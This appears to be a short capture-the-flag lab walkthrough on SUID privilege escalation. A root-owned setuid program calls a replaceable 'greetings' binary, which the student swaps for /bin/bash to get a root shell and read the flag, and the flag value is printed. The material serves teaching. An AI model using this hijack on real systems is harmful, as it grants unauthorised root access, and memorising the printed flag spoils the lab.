🔬SUID

Lab 1

🔬 Exploiting Setuid Programs
SUID Privilege escalation
Already logged on as student unprivileged user

pwd
ls -al

drwxr-xr-x 1 student student 4096 Sep 22  2018 .
drwxr-xr-x 1 root    root    4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root      88 Sep 22  2018 .bashrc
-r-x------ 1 root    root    8296 Sep 22  2018 greetings
-rwsr-xr-x 1 root    root    8344 Sep 22  2018 welcome

📌 welcome file has the SUID permission applied

./greetings
	bash: ./greetings: Permission denied
./welcome
	Welcome to Attack Defense Labs

file welcome

welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped

strings welcome

It calls greetings binary

rm greetings
cp /bin/bash greetings
./welcome

cd /root
cat flag

Reveal Flag: 🚩

b92bcdc876d52108778e2d81f3b01494

Previous🔬Cron Jobs Next🔬Hashes Dumping

Last updated 1 year ago